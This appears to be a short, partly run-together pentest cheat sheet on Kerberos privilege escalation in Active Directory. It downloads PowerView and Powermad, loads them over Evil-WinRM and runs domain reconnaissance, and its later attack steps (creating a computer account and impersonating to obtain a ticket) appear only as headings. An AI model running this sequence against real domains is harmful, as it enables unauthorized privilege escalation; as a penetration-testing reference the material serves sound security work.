Kerberos Privilege Escalation
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1# Evil-WinRM
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps11. Check User's Permission and Windows Versions
Get-DomainObject -Identity "dc=example,dc=com" -Domain example.com
# -------------------------
# Result
ms-ds-machineaccountquota: 10Get-DomainController
# -------------------------
# Result
OSVersion: Windows Server 2022 Standard2. Create a New Computer
3. Impersonate to Get a Ticket
4. Make the Ticket Usable and Use It
Last updated